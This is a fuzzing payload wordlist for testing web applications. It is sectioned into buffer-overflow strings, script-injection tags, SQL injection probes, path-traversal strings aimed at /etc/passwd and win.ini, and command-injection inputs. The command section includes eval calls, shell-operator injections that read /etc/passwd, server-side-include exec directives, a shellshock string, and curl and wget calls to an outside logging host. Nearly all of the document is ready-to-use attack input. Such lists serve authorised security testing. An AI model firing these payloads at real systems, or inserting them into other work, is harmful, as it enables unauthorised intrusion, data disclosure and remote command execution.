0
1
2
3
4
5
6
7
8
9
0123456789
-1
-2
-3
-4
-5
-6
-7
-8
-9
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
abcdefghijklmnopqrstuvwxyz
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
ABCDEFGHIJKLMNOPQRSTUVWXYZ
~
~~
!
!!
@
@@
#
##
$
$$
%
%%
^
^^
&
&&
*
**
(
((
)
))
-
--
_
__
+
++
=
==
{
{{
}
}}
]
]]
[
[[
|
||
\
\\
`
``
,
,,
.
..
/
//
?
??
;
;;
:
::
'
''
"
""
<
<<
>
>>
~!@#$%^&*()-_+={}][|\`,./?;:'"<>
" #
" --
"'
")
"/*
">
' #
' --
' –
'"
'">
'#
')
'--
'/*
'>
'\"
('
-->
/*
//
<!--
<!-- 
<></>():;<!--
\'"
########## - OVERFLOW - ##########
1
11
111
1111
11111
111111
1111111
11111111
111111111
1111111111
11111111111
111111111111
1111111111111
11111111111111
111111111111111
1111111111111111
11111111111111111
111111111111111111
1111111111111111111
11111111111111111111
111111111111111111111
1111111111111111111111
11111111111111111111111
111111111111111111111111
1111111111111111111111111
11111111111111111111111111
111111111111111111111111111
1111111111111111111111111111
11111111111111111111111111111
111111111111111111111111111111
1111111111111111111111111111111
11111111111111111111111111111111
111111111111111111111111111111111
1111111111111111111111111111111111
11111111111111111111111111111111111
111111111111111111111111111111111111
1111111111111111111111111111111111111
11111111111111111111111111111111111111
111111111111111111111111111111111111111
1111111111111111111111111111111111111111
11111111111111111111111111111111111111111
111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA
AAAAAAAAAAAAAA
AAAAAAAAAAAAA
AAAAAAAAAAAA
AAAAAAAAAAA
AAAAAAAAAA
AAAAAAAAA
AAAAAAAA
AAAAAAA
AAAAAA
AAAAA
AAAA
AAA
AA
A
########## - XSS - ##########
<h1>
<b>
<a>
<form>
<img>
<h1></h1>
<b></b>
<a></a>
<form></form>
<img/><img>
<h1>test</h1>
<b>test</b>
<a href="#">test</a>
<script>alert(1)</script>
<img src="0" onclick="alert(1)"/>
<img src="0" onerror="alert(1)"/>
<img src=0 onclick=alert(1)/>
<img src=0 onerror=alert(1)/>
########## - SQL_INJECTION - ##########
OR 1=1
1 OR 1=1
1 OR 1=1#
1 OR 1=1 -- -
1') and '1'='1'
1") and "1"="1"
1' or '1'='1
1' or '1'='1'#
1' or '1'='1'-- -
admin
admin' #
admin' -- -
admin'/*
1 order by 1
1 order by 2
1 order by 3
1 order by 4
1 order by 5
1 order by 6
1 order by 7
1 order by 8
1 order by 9
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),3,4,5
ORDER BY 1,SLEEP(5),3,4,5#
ORDER BY 1,SLEEP(5),3,4,5,6
ORDER BY 1,SLEEP(5),3,4,5,6#
ORDER BY 1,SLEEP(5),3,4,5,6,7
ORDER BY 1,SLEEP(5),3,4,5,6,7#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8
ORDER BY 1,SLEEP(5),3,4,5,6,7,8#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
' UNION SELECT 1,2,3'
'" UNION SELECT 1,SLEEP(5),"'3
'" UNION SELECT 1,SLEEP(5),"'3'"#
'" UNION SELECT 1,SLEEP(5),3,4#
'" UNION SELECT 1,SLEEP(5),3,4,5#
'" UNION SELECT 1,SLEEP(5),3,4,5,6#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
'" UNION SELECT 1,SLEEP(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION SELECT NULL
UNION SELECT NULL,NULL
UNION SELECT NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL
a' UNION SELECT NULL,NULL
a' UNION SELECT NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
a' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL
0' UNION SELECT NULL,NULL
0' UNION SELECT NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
0' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL
' UNION SELECT NULL,NULL
' UNION SELECT NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
########## - PATH_TRAVERSAL - ##########
..\WINDOWS\win.ini
..\..\WINDOWS\win.ini
..\..\..\WINDOWS\win.ini
..\..\..\..\WINDOWS\win.ini
..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\WINDOWS\win.ini
\WINDOWS\win.ini
/etc/passwd
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
/etc/passwd%00
/../etc/passwd%00
/../../etc/passwd
/../../../etc/passwd%00
/../../../../etc/passwd%00
/../../../../../etc/passwd%00
/../../../../../../etc/passwd%00
/../../../../../../../etc/passwd%00
/../../../../../../../../etc/passwd%00
/../../../../../../../../../etc/passwd%00
/../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
########## - COMMANDS - ##########
eval('id')
eval('ls')
eval('pwd')
eval('whoami')
eval('sleep 20')
eval('cat /etc/passwd')
127.0.0.1 & id
127.0.0.1 && id
127.0.0.1 ; id
127.0.0.1 | id
127.0.0.1 & whoami
127.0.0.1 && whoami
127.0.0.1 ; whoami
127.0.0.1 | whoami
127.0.0.1 & sleep 20
127.0.0.1 && sleep 20
127.0.0.1 ; sleep 20
127.0.0.1 | sleep 20
127.0.0.1 & cat /etc/passwd
127.0.0.1 && cat /etc/passwd
127.0.0.1 ; cat /etc/passwd
127.0.0.1 | cat /etc/passwd
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="cat /etc/passwd" -->
<!--#exec cmd="curl http://log.michalszalkowski.com" -->
<!--#exec cmd="dir" -->
<!--#exec cmd="ipconfig" -->
<!--#exec cmd="ls" -->
<!--#exec cmd="perl -e 'print "X"*5000'" -->
<!--#exec cmd="sleep 10" -->
<!--#exec cmd="uname" -->
<!--#exec cmd="/usr/bin/id;-->
<!--#exec cmd="whoami" -->
" & whoami
" && whoami
" | whoami
" || whoami
" whoami
"; whoami
& whoami
&& whoami
' & whoami
' && whoami
' || whoami
' whoami
'; whoami
; whoami
| whoami
whoami
() { :;}; wget http://log.michalszalkowski.com
& wget http://log.michalszalkowski.com
| wget http://log.michalszalkowski.com
&& wget http://log.michalszalkowski.com
; wget http://log.michalszalkowski.com
wget http://log.michalszalkowski.com
& wget http://log.michalszalkowski.com
&& wget http://log.michalszalkowski.com
; wget http://log.michalszalkowski.com
$(`cat /etc/passwd`)
$(`dir`)
$(`ls`)
;${@print(md5(0))};
${@print("0")}
{${sleep(20)}}
%20{${sleep(20)}}
{${sleep(hexdec(dechex(20)))}} 
$(`whoami`)
& id
&&id
;id
;id;
;id|
`id`
| id
|id
;id\n
& ifconfig
&& ifconfig
; ifconfig
| ifconfig
ifconfig
